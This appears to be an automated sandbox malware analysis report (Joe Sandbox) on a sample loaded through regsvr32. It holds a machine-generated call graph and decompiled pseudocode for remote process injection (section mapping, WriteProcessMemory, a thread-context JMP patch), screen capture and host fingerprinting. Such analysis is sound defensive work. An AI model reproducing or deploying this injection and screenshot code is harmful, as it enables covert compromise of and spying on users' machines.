15230 738983 15100->15230 15103 738927 strncpy 15104 738266 15103->15104 15105 738927 strncpy 15104->15105 15106 73827a 15105->15106 15107 738927 strncpy 15106->15107 15108 73828e 15107->15108 15109 
738983 5 API calls 15108->15109 15110 738296 15109->15110 15111 738927 strncpy 15110->15111 15112 7382a1 15111->15112 15113 738983 5 API calls 15112->15113 15114 7382a9 15113->15114 15115 738927 strncpy 15114->15115 15116 7382b4 15115->15116 15117 738983 5 API calls 15116->15117 15118 7382bc 15117->15118 15119 738927 strncpy 15118->15119 15120 7382c7 15119->15120 15121 738927 strncpy 15120->15121 15122 7382db 15121->15122 15123 738983 5 API calls 15122->15123 15124 7382e3 15123->15124 15125 738927 strncpy 15124->15125 15126 7382ee 15125->15126 15127 738927 strncpy 15126->15127 15128 738308 15127->15128 15129 738983 5 API calls 15128->15129 15130 738310 15129->15130 15131 738927 strncpy 15130->15131 15132 73831b 15131->15132 15133 738927 strncpy 15132->15133 15134 73832f 15133->15134 15135 738927 strncpy 15134->15135 15136 738343 15135->15136 15137 738983 5 API calls 15136->15137 15138 738357 15137->15138 15139 738927 strncpy 15138->15139 15140 738362 15139->15140 15141 738927 strncpy 15140->15141 15142 738376 15141->15142 15143 738927 strncpy 15142->15143 15144 73838a 15143->15144 15145 738983 5 API calls 15144->15145 15146 738395 15145->15146 15147 738927 strncpy 15146->15147 15148 7383a0 15147->15148 15149 738983 5 API calls 15148->15149 15150 7383ab 15149->15150 15151 738927 strncpy 15150->15151 15152 7383b6 15151->15152 15153 738983 5 API calls 15152->15153 15154 7383c1 15153->15154 15155 738927 strncpy 15154->15155 15156 7383cc 15155->15156 15157 738983 5 API calls 15156->15157 15158 7383d7 15157->15158 15159 738927 strncpy 15158->15159 15160 7383e2 15159->15160 15161 738983 5 API calls 15160->15161 15162 7383ed 15161->15162 15163 738927 strncpy 15162->15163 15164 7383f8 15163->15164 15165 738983 5 API calls 15164->15165 15166 738403 15165->15166 15167 738927 strncpy 15166->15167 15168 73840e 15167->15168 15169 738983 5 API calls 15168->15169 15170 738419 15169->15170 15171 738927 strncpy 15170->15171 15172 738424 15171->15172 15173 738983 5 API calls 
15172->15173 15174 73842f 15173->15174 15175 738927 strncpy 15174->15175 15176 73843a 15175->15176 15177 738983 5 API calls 15176->15177 15178 738445 15177->15178 15179 738927 strncpy 15178->15179 15180 738450 15179->15180 15181 738983 5 API calls 15180->15181 15182 73845e 15181->15182 15183 738927 strncpy 15182->15183 15184 738469 15183->15184 15185 738983 5 API calls 15184->15185 15186 738474 15185->15186 15187 738927 strncpy 15186->15187 15188 73847f 15187->15188 15189 738983 5 API calls 15188->15189 15190 73848a 15189->15190 15235 739b62 15230->15235 15232 738996 15233 738ddf 2 API calls 15232->15233 15234 73825b 15232->15234 15233->15234 15234->15103 15236 739b71 WideCharToMultiByte 15235->15236 15243 739bc1 15235->15243 15237 739b8c 15236->15237 15236->15243 15244 738dc9 RtlAllocateHeap 15237->15244 15239 739b95 15240 739b9d WideCharToMultiByte 15239->15240 15239->15243 15241 739bb6 15240->15241 15240->15243 15242 738ddf 2 API calls 15241->15242 15242->15243 15243->15232 15244->15239 15246 739913 15245->15246 15247 7436d5 2 API calls 15246->15247 15248 73995d 15247->15248 15249 737ae9 15248->15249 15250 7436d5 2 API calls 15248->15250 15249->14862 15250->15248 15252 7411b3 7 API calls 15251->15252 15253 737f21 15252->15253 15254 738927 strncpy 15253->15254 15255 737f37 15254->15255 15256 738927 strncpy 15255->15256 15257 737f4c 15256->15257 15258 738927 strncpy 15257->15258 15259 737f60 15258->15259 15260 738927 strncpy 15259->15260 15261 737f75 15260->15261 15262 738927 strncpy 15261->15262 15263 737f86 15262->15263 15264 738927 strncpy 15263->15264 15265 737f9f 15264->15265 15266 738927 strncpy 15265->15266 15267 737fb5 15266->15267 15268 738927 strncpy 15267->15268 15269 737fc6 15268->15269 15270 738927 strncpy 15269->15270 15271 737fda 15270->15271 15272 738927 strncpy 15271->15272 15273 737fed 15272->15273 15274 738927 strncpy 15273->15274 15275 738001 15274->15275 15276 738927 strncpy 15275->15276 15277 738020 15276->15277 15278 738983 5 API calls 
15277->15278 15279 738031 15278->15279 15280 738927 strncpy 15279->15280 15281 73803c 15280->15281 15282 738983 5 API calls 15281->15282 15283 73804d 15282->15283 15284 738927 strncpy 15283->15284 15285 738058 15284->15285 15286 738927 strncpy 15285->15286 15287 738074 15286->15287 15288 741c34 13 API calls 15287->15288 15289 73807c 15288->15289 15289->14866 15291 741d21 18 API calls 15290->15291 15292 73795d 15291->15292 15293 73a06e memset 15292->15293 15296 737969 15292->15296 15294 73799d 15293->15294 15294->15296 15324 738dc9 RtlAllocateHeap 15294->15324 15296->14877 15297 737a75 15299 738ddf 2 API calls 15297->15299 15301 737a86 15297->15301 15298 737a21 15298->15296 15298->15297 15300 739a76 RtlAllocateHeap 15298->15300 15299->15297 15300->15298 15302 738ddf 2 API calls 15301->15302 15302->15296 15304 737826 15303->15304 15305 7378b6 15304->15305 15306 73bfc8 2 API calls 15304->15306 15305->14880 15305->14887 15307 737842 15306->15307 15307->15305 15308 73788e 15307->15308 15325 738dc9 RtlAllocateHeap 15307->15325 15310 738ddf 2 API calls 15308->15310 15312 7378ac 15310->15312 15311 73785f 15311->15308 15314 739fa5 2 API calls 15311->15314 15313 738ddf 2 API calls 15312->15313 15313->15305 15315 73787e 15314->15315 15326 738bbb 15315->15326 15342 73808f 15317->15342 15319 7377db 15320 7376f8 19 API calls 15319->15320 15321 7377fb 15320->15321 15322 738ddf 2 API calls 15321->15322 15323 737806 15322->15323 15323->14887 15324->15298 15325->15311 15329 738a4f 15326->15329 15336 7389b9 15329->15336 15331 738a7c 15331->15308 15332 738aa8 GetLastError 15335 738b37 15332->15335 15333 738ddf 2 API calls 15333->15331 15335->15333 15341 738dc9 RtlAllocateHeap 15336->15341 15338 738a2c 15338->15331 15338->15332 15338->15335 15339 7389ca 15339->15338 15340 738a1b lstrlenW 15339->15340 15340->15338 15341->15339 15343 7411b3 7 API calls 15342->15343 15344 73809e 15343->15344 15345 738927 strncpy 15344->15345 15346 7380b4 15345->15346 15347 738927 strncpy 15346->15347 
15348 7380c8 15347->15348 15349 738927 strncpy 15348->15349 15350 7380d9 15349->15350 15351 738927 strncpy 15350->15351 15352 7380ea 15351->15352 15353 738927 strncpy 15352->15353 15354 7380ff 15353->15354 15355 738927 strncpy 15354->15355 15356 738115 15355->15356 15357 738927 strncpy 15356->15357 15358 73812b 15357->15358 15359 741c34 13 API calls 15358->15359 15360 738133 15359->15360 15360->15319 15361 735f94 15367 738dc9 RtlAllocateHeap 15361->15367 15363 736012 15365 73a1f8 GetSystemTimeAsFileTime 15366 735fa9 15365->15366 15366->15363 15366->15365 15368 735d1e GetDC 15366->15368 15367->15366 15369 735f3e 15368->15369 15370 735d50 CreateCompatibleDC 15368->15370 15372 738ddf 2 API calls 15369->15372 15370->15369 15371 735d61 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 15370->15371 15371->15369 15373 735d8c SelectObject 15371->15373 15374 735f5d 15372->15374 15373->15369 15375 735d9f BitBlt GetCursorInfo 15373->15375 15376 738ddf 2 API calls 15374->15376 15377 735dd0 15375->15377 15378 735e25 SelectObject 15375->15378 15379 735f68 15376->15379 15377->15378 15380 735dd5 CopyIcon GetIconInfo GetObjectW DrawIconEx 15377->15380 15378->15369 15381 735e39 GetObjectW 15378->15381 15382 735f76 15379->15382 15383 735f6f DeleteDC 15379->15383 15380->15378 15394 738dc9 RtlAllocateHeap 15381->15394 15384 735f81 15382->15384 15385 735f7a DeleteDC 15382->15385 15383->15382 15387 735f85 DeleteObject 15384->15387 15388 735f8c 15384->15388 15385->15384 15387->15388 15388->15366 15389 735ea2 15389->15369 15390 735eae GetDIBits 15389->15390 15395 738dc9 RtlAllocateHeap 15390->15395 15392 735ed4 15392->15369 15393 73fbfb 18 API calls 15392->15393 15393->15369 15394->15389 15395->15392 11195 736603 11196 736611 11195->11196 11198 736669 11195->11198 11224 738db4 HeapCreate 11196->11224 11199 736616 11225 739787 11199->11225 11208 736664 11210 738d9a 2 API calls 11208->11210 11209 73666e 11245 738d9a 11209->11245 11210->11198 11217 7366c5 CreateThread 11217->11198 11325 
7363a2 11217->11325 11218 73f0d9 8 API calls 11219 7366a0 11218->11219 11258 73647a memset 11219->11258 11224->11199 11277 738dc9 RtlAllocateHeap 11225->11277 11227 73661b 11228 743d36 11227->11228 11229 743d6b 11228->11229 11278 738e2e 11229->11278 11231 736629 11232 73f0d9 11231->11232 11282 739f6b 11232->11282 11235 73f103 LoadLibraryA 11237 73f10a 11235->11237 11236 73f0fb GetModuleHandleA 11236->11237 11240 73f118 11237->11240 11285 73f08e 11237->11285 11290 738d87 11240->11290 11242 739f85 11308 738ca3 11242->11308 11244 736650 GetFileAttributesW 11244->11208 11244->11209 11246 736673 11245->11246 11247 738da8 11245->11247 11249 73109a 11246->11249 11248 738ddf 2 API calls 11247->11248 11248->11246 11250 738ca3 2 API calls 11249->11250 11251 7310b5 11250->11251 11252 73fcda 11251->11252 11253 73fcf6 11252->11253 11254 736687 11253->11254 11314 738dc9 RtlAllocateHeap 11253->11314 11254->11217 11254->11218 11256 73fd09 11256->11254 11257 738ddf 2 API calls 11256->11257 11257->11254 11315 731080 11258->11315 11260 7364a6 11261 7364b7 11260->11261 11262 7364f8 11260->11262 11263 731080 2 API calls 11261->11263 11264 731080 2 API calls 11262->11264 11265 7364c1 11263->11265 11266 736502 11264->11266 11318 739fa5 11265->11318 11269 738d87 2 API calls 11266->11269 11268 7364d7 11270 738d87 2 API calls 11268->11270 11271 7364e2 11269->11271 11270->11271 11272 738ddf 11271->11272 11273 7366b5 11272->11273 11274 738de9 11272->11274 11273->11217 11274->11273 11275 738f63 memset 11274->11275 11276 738e19 HeapFree 11275->11276 11276->11273 11277->11227 11281 738dc9 RtlAllocateHeap 11278->11281 11280 738e3f 11280->11231 11281->11280 11294 738bcd 11282->11294 11301 738dc9 RtlAllocateHeap 11285->11301 11287 73f0a0 11289 73f0cf 11287->11289 11302 73ef38 11287->11302 11289->11240 11291 73663f 11290->11291 11292 738d8f 11290->11292 11291->11242 11293 738ddf 2 API calls 11292->11293 11293->11291 11295 738be4 11294->11295 11299 738c05 11294->11299 11295->11299 11300 738dc9 

              Control-flow Graph

              C-Code - Quality: 95%
              			E0073D538(void* __ecx, intOrPtr __edx) {
              				void* _v8;
              				void* _v12;
              				void* _v16;
              				void* _v20;
              				long _v24;
              				long _v28;
              				short _v32;
              				char _v36;
              				intOrPtr* _v40;
              				intOrPtr _v44;
              				long _v48;
              				void* _v52;
              				void* _v53;
              				char _v64;
              				short _v68;
              				struct _WNDCLASSEXA _v116;
              				char _t81;
              				intOrPtr* _t83;
              				intOrPtr _t87;
              				intOrPtr _t90;
              				char _t97;
              				short _t98;
              				intOrPtr _t105;
              				long _t107;
              				char _t119;
              				void* _t124;
              				struct HWND__* _t132;
              				void* _t138;
              				void* _t147;
              				void* _t154;
              				intOrPtr _t155;
              				intOrPtr _t157;
              				void* _t158;
              				void* _t163;
              				void* _t165;
              
              				_t81 =  *0x74f8d4; // 0xc2fc00
              				_t138 = 0;
              				_v12 = __ecx;
              				_t157 = __edx;
              				_v20 = 0;
              				_v52 = 0;
              				_v48 = 0;
              				_v16 = 0;
              				_v8 = 0;
              				_v24 = 0;
              				_v44 = __edx;
              				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
              					E0073F15B(0x1f4);
              				}
              				_t12 = _t157 + 0x3c; // 0x852c50ff
              				_t83 =  *_t12 + _t157;
              				_v28 = _t138;
              				_v40 = _t83;
              				if( *_t83 != 0x4550) {
              					L14:
              					_t158 = _v12;
              					L15:
              					if(_v8 != _t138) {
              						_t90 =  *0x74f9d0; // 0xc2fa00
              						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
              						_v8 = _t138;
              					}
              					L17:
              					if(_v16 != 0) {
              						_t87 =  *0x74f8d0; // 0xc2f8c0
              						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
              					}
              					if(_v20 != 0) {
              						NtClose(_v20);
              					}
              					return _v8;
              				}
              				_v52 =  *((intOrPtr*)(_t83 + 0x50));
              				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
              					goto L14;
              				}
              				_t97 =  *"18293"; // 0x39323831
              				_v36 = _t97;
              				_t98 =  *0x74ce70; // 0x33
              				_v32 = _t98;
              				_v116.lpszClassName =  &_v64;
              				asm("movsd");
              				_v116.lpfnWndProc = DefWindowProcW;
              				_v116.cbWndExtra = _t138;
              				asm("movsd");
              				_v116.style = 0xb;
              				_v116.lpszMenuName = _t138;
              				_v116.cbSize = 0x30;
              				asm("movsb");
              				_v116.cbClsExtra = _t138;
              				_v116.hInstance = _t138;
              				if(RegisterClassExA( &_v116) != 0) {
              					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
              					if(_t132 != 0) {
              						DestroyWindow(_t132);
              						UnregisterClassA( &_v64, _t138);
              					}
              				}
              				_t105 =  *0x74f8d0; // 0xc2f8c0
              				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
              				_t158 = _v12;
              				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
              					goto L15;
              				} else {
              					_t154 = E00738E2E( *0x74f8d4, 0x1ac4);
              					_v36 = _t154;
              					if(_t154 == 0) {
              						goto L15;
              					}
              					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
              					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
              					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
              					E00738DDF( &_v36, 0x1ac4);
              					_t119 =  *0x74f8d4; // 0xc2fc00
              					_t155 =  *0x74f8e8; // 0x730000
              					_v36 = _t119;
              					 *0x74f8e8 = _v8;
              					 *0x74f8d4 = _t163;
              					E00738EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
              					E0073D4B7(_v16, _v8, _v44);
              					_t124 = E0073A5D0("Jjischug");
              					_v53 = _t138;
              					_t147 = 0xf;
              					if(_t124 > _t147) {
              						do {
              							L12:
              							_t63 = _t138 + 0x41; // 0x41
              							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
              							_t138 = _t138 + 1;
              						} while (_t138 < _t147);
              						L13:
              						lstrlenW( &_v68);
              						 *0x74f8e8 = _t155;
              						 *0x74f8d4 = _v36;
              						goto L17;
              					}
              					_t147 = _t124;
              					if(_t147 == 0) {
              						goto L13;
              					}
              					goto L12;
              				}
              			}

              APIs
              • NtCreateSection.NTDLL(0073DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0073D5AA
              • RegisterClassExA.USER32(?), ref: 0073D5FE
              • CreateWindowExA.USER32 ref: 0073D629
              • DestroyWindow.USER32(00000000), ref: 0073D634
              • UnregisterClassA.USER32 ref: 0073D63F
              • NtMapViewOfSection.NTDLL(0073DA07,00000000), ref: 0073D66A
              • NtMapViewOfSection.NTDLL(0073DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0073D691
              • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0073D6D7
              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0073D6F1
                • Part of subcall function 00738DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00738E25
              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,00736297), ref: 0073D769
              • NtUnmapViewOfSection.NTDLL(00000000), ref: 0073D7B1
              • NtClose.NTDLL(00000000), ref: 0073D7C5
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
              • String ID: 0$18293$Jjischug$aeroflot
              • API String ID: 494031690-3772587274
              • Opcode ID: b47c91bc8402b750e5231aa36db5e415f61c2858e06f549da993aa54d24e5bfc
              • Instruction ID: ca6ad170f1d20b648f744dbc8f2debe5558446d285a7ead48c98fe5dfbe4c529
              • Opcode Fuzzy Hash: b47c91bc8402b750e5231aa36db5e415f61c2858e06f549da993aa54d24e5bfc
              • Instruction Fuzzy Hash: BF811AB5901219EFEB10DF94EC89AEEBBB8FF09344F14406AE515E7261D778AD00CB64
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 79%
              			E0073DFC2(void* __fp0) {
              				char _v8;
              				char _v12;
              				char _v16;
              				char _v144;
              				char _v656;
              				char _v668;
              				char _v2644;
              				void* __esi;
              				struct _OSVERSIONINFOA* _t68;
              				intOrPtr _t70;
              				void* _t71;
              				intOrPtr _t73;
              				void* _t74;
              				intOrPtr _t75;
              				intOrPtr* _t77;
              				intOrPtr _t79;
              				intOrPtr _t80;
              				intOrPtr _t81;
              				intOrPtr _t87;
              				int _t90;
              				intOrPtr _t92;
              				void* _t93;
              				void* _t97;
              				intOrPtr _t99;
              				intOrPtr _t101;
              				short _t106;
              				char _t108;
              				intOrPtr _t113;
              				intOrPtr _t116;
              				intOrPtr _t119;
              				intOrPtr _t123;
              				intOrPtr _t134;
              				intOrPtr _t136;
              				intOrPtr _t138;
              				intOrPtr _t141;
              				intOrPtr _t143;
              				intOrPtr _t148;
              				void* _t149;
              				WCHAR* _t150;
              				char* _t151;
              				intOrPtr _t162;
              				intOrPtr _t177;
              				void* _t191;
              				struct _OSVERSIONINFOA* _t192;
              				void* _t193;
              				void* _t195;
              				char _t198;
              				void* _t199;
              				char* _t200;
              				void* _t203;
              				int* _t204;
              				void* _t216;
              
              				_t216 = __fp0;
              				_t148 =  *0x74f8e8; // 0x730000
              				_t68 = E00738DC9(0x1ac4);
              				_t192 = _t68;
              				if(_t192 != 0) {
              					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
              					_t70 =  *0x74f8d0; // 0xc2f8c0
              					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
              					_t3 = _t192 + 0x648; // 0x648
              					E007435A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
              					_t73 =  *0x74f8d0; // 0xc2f8c0
              					_t5 = _t192 + 0x1644; // 0x1644
              					_t194 = _t5;
              					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
              					_t207 = _t74;
              					if(_t74 != 0) {
              						 *((intOrPtr*)(_t192 + 0x1854)) = E007397E9(_t194, _t207);
              					}
              					_t75 =  *0x74f8d0; // 0xc2f8c0
              					_t77 = E0073CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
              					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
              					_t159 =  *_t77;
              					if(E0073CB85( *_t77) == 0) {
              						_t79 = E0073CA5A(_t159, _t194); // executed
              						__eflags = _t79;
              						_t162 = (0 | _t79 > 0x00000000) + 1;
              						__eflags = _t162;
              						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
              					} else {
              						 *((intOrPtr*)(_t192 + 0x214)) = 3;
              					}
              					_t14 = _t192 + 0x220; // 0x220, executed
              					_t80 = E0073F3A0(_t14); // executed
              					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
              					_t81 = E0073F365(_t14); // executed
              					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
              					_t17 = _t192 + 0x114; // 0x114
              					_t195 = _t17;
              					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
              					_push( &_v16);
              					_v12 = 0x80;
              					_push( &_v8);
              					_v8 = 0x100;
              					_push( &_v656);
              					_push( &_v12);
              					_push(_t195);
              					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
              					_t87 =  *0x74f8d8; // 0xc2fab0
              					_push(0); // executed
              					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
              						GetLastError();
              					}
              					_t90 = GetSystemMetrics(0x1000);
              					_t28 = _t192 + 0x228; // 0x228
              					_t149 = _t28;
              					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
              					E0073DFBB(_t149); // executed
              					_t211 = _t149;
              					if(_t149 != 0) {
              						 *((intOrPtr*)(_t192 + 0x434)) = E007397E9(_t149, _t211);
              					}
              					_t92 = E0073C85A();
              					_t33 = _t192 + 0xb0; // 0xb0
              					_t196 = _t33;
              					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
              					_t93 = E0073C64D(_t92, _t33, _t211, _t216);
              					_t35 = _t192 + 0xd0; // 0xd0
              					E00739BD5(_t93, _t33, _t35);
              					_t36 = _t192 + 0x438; // 0x438
              					E00739803(_t149, _t36);
              					_t97 = E0073E34A(_t196, E0073A5D0(_t33), 0);
              					_t37 = _t192 + 0x100c; // 0x100c
              					E0073C870(_t97, _t37, _t216);
              					_t99 =  *0x74f8d0; // 0xc2f8c0
              					_t101 = E0073CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
              					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
              					E00738F63(_t192, 0, 0x9c);
              					_t204 = _t203 + 0xc;
              					_t192->dwOSVersionInfoSize = 0x9c;
              					GetVersionExA(_t192);
              					 *((intOrPtr*)(_t192 + 0xa8)) = E0073DDBE(_t100);
              					_t106 = E0073DDE7(_t105);
              					_t41 = _t192 + 0x1020; // 0x1020
              					_t150 = _t41;
              					 *((short*)(_t192 + 0x9c)) = _t106;
              					GetWindowsDirectoryW(_t150, 0x104);
              					_t108 = E00739F85(_t105, 0xf73);
              					_t177 =  *0x74f8d0; // 0xc2f8c0
              					_t198 = _t108;
              					 *_t204 = 0x104;
              					_push( &_v668);
              					_push(_t198);
              					_v8 = _t198;
              					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
              						_t143 =  *0x74f8d0; // 0xc2f8c0
              						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
              					}
              					E00738D9A( &_v8);
              					_t113 =  *0x74f8d0; // 0xc2f8c0
              					_t48 = _t192 + 0x1434; // 0x1434
              					_t199 = _t48;
              					 *_t204 = 0x209;
              					_push(_t199);
              					_push(L"USERPROFILE");
              					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
              						E00739FE4(_t199, 0x105, L"%s\\%s", _t150);
              						_t141 =  *0x74f8d0; // 0xc2f8c0
              						_t204 =  &(_t204[5]);
              						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
              					}
              					_push(0x20a);
              					_t51 = _t192 + 0x122a; // 0x122a
              					_t151 = L"TEMP";
              					_t116 =  *0x74f8d0; // 0xc2f8c0
              					_push(_t151);
              					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
              						_t138 =  *0x74f8d0; // 0xc2f8c0
              						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
              					}
              					_push(0x40);
              					_t200 = L"SystemDrive";
              					_push( &_v144);
              					_t119 =  *0x74f8d0; // 0xc2f8c0
              					_push(_t200);
              					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
              						_t136 =  *0x74f8d0; // 0xc2f8c0
              						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
              					}
              					_v8 = 0x7f;
              					_t59 = _t192 + 0x199c; // 0x199c
              					_t123 =  *0x74f8d0; // 0xc2f8c0
              					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
              					_t62 = _t192 + 0x100c; // 0x100c
              					E007435A9(E0073E34A(_t62, E0073A5D0(_t62), 0),  &_v2644);
              					_t63 = _t192 + 0x1858; // 0x1858
              					E0074357B( &_v2644, _t63, 0x20);
              					_push( &_v2644);
              					_push(0x1e);
              					_t66 = _t192 + 0x1878; // 0x1878
              					_t191 = 0x14;
              					E007398D0(_t66, _t191);
              					_t134 = E0073DB68(_t191); // executed
              					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
              					return _t192;
              				}
              				return _t68;
              			}

              APIs
                • Part of subcall function 00738DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              • GetCurrentProcessId.KERNEL32 ref: 0073DFE9
              • GetLastError.KERNEL32 ref: 0073E0E3
              • GetSystemMetrics.USER32(00001000), ref: 0073E0F3
              • GetVersionExA.KERNEL32(00000000), ref: 0073E1A8
                • Part of subcall function 0073CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,00730000), ref: 0073CAFE
              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0073E1D3
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
              • API String ID: 3131805607-2706916422
              • Opcode ID: 7beac18cba9e5915a60a56c442105eebc30ac6be56a6c3a3f75514c497910318
              • Instruction ID: 87f8fa17a387f7ac7d8780f54b4d8338128039740ae53de15751ea47221ca9ec
              • Opcode Fuzzy Hash: 7beac18cba9e5915a60a56c442105eebc30ac6be56a6c3a3f75514c497910318
              • Instruction Fuzzy Hash: E2918E75700605EFE704EB74DC49FEAB7E8BF09300F04416AF519D7292EB78AA448BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 143 73d9de-73d9f7 call 73d309 146 73dad0-73dadb call 73d47c 143->146 147 73d9fd-73da0b call 73d538 143->147 147->146 152 73da11-73da48 call 738f63 GetThreadContext 147->152 152->146 155 73da4e-73da8e NtProtectVirtualMemory 152->155 156 73da90-73daab NtWriteVirtualMemory 155->156 157 73dace 155->157 156->157 158 73daad-73dacc NtProtectVirtualMemory 156->158 157->146 158->146 158->157
              C-Code - Quality: 100%
              			E0073D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
              				long _v8;
              				long _v12;
              				void* _v16;
              				intOrPtr _v23;
              				void _v24;
              				long _v28;
              				struct _CONTEXT _v744;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t33;
              				void* _t57;
              				long _t59;
              				void* _t62;
              				void** _t65;
              				void* _t66;
              
              				_t65 = __edx;
              				_t57 = __ecx;
              				_t66 = 0;
              				if(E0073D309(__ecx, __edx, __edx, 0) != 0) {
              					_t33 = E0073D538( *((intOrPtr*)(__edx)), _a4); // executed
              					_t66 = _t33;
              					if(_t66 != 0) {
              						E00738F63( &_v744, 0, 0x2cc);
              						_v744.ContextFlags = 0x10002;
              						if(GetThreadContext(_t65[1],  &_v744) != 0) {
              							_t62 = _v744.Eax;
              							_v12 = _v12 & 0x00000000;
              							_v24 = 0xe9;
              							_t59 = 5;
              							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
              							_v8 = _t59;
              							_v16 = _t62;
              							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
              								L6:
              								_t66 = 0;
              							} else {
              								_v28 = _v28 & 0x00000000;
              								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
              									goto L6;
              								}
              							}
              						}
              					}
              				}
              				E0073D47C();
              				return _t66;
              			}

              APIs
                • Part of subcall function 0073D309: LoadLibraryW.KERNEL32 ref: 0073D403
                • Part of subcall function 0073D538: NtCreateSection.NTDLL(0073DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0073D5AA
                • Part of subcall function 0073D538: RegisterClassExA.USER32(?), ref: 0073D5FE
                • Part of subcall function 0073D538: CreateWindowExA.USER32 ref: 0073D629
                • Part of subcall function 0073D538: DestroyWindow.USER32(00000000), ref: 0073D634
                • Part of subcall function 0073D538: UnregisterClassA.USER32 ref: 0073D63F
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0073DA40
              • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0073DA89
              • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0073DAA6
              • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0073DAC7
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
              • String ID:
              • API String ID: 1578692462-0
              • Opcode ID: 550e93fe8c4a587f071f0349e4e1cc29e48d6e8e997aa570239b38f00566ca61
              • Instruction ID: f1832a75d471ba21f9982afc1f930fd8b4a2e8063dcaa1a12a95cdab20df17d4
              • Opcode Fuzzy Hash: 550e93fe8c4a587f071f0349e4e1cc29e48d6e8e997aa570239b38f00566ca61
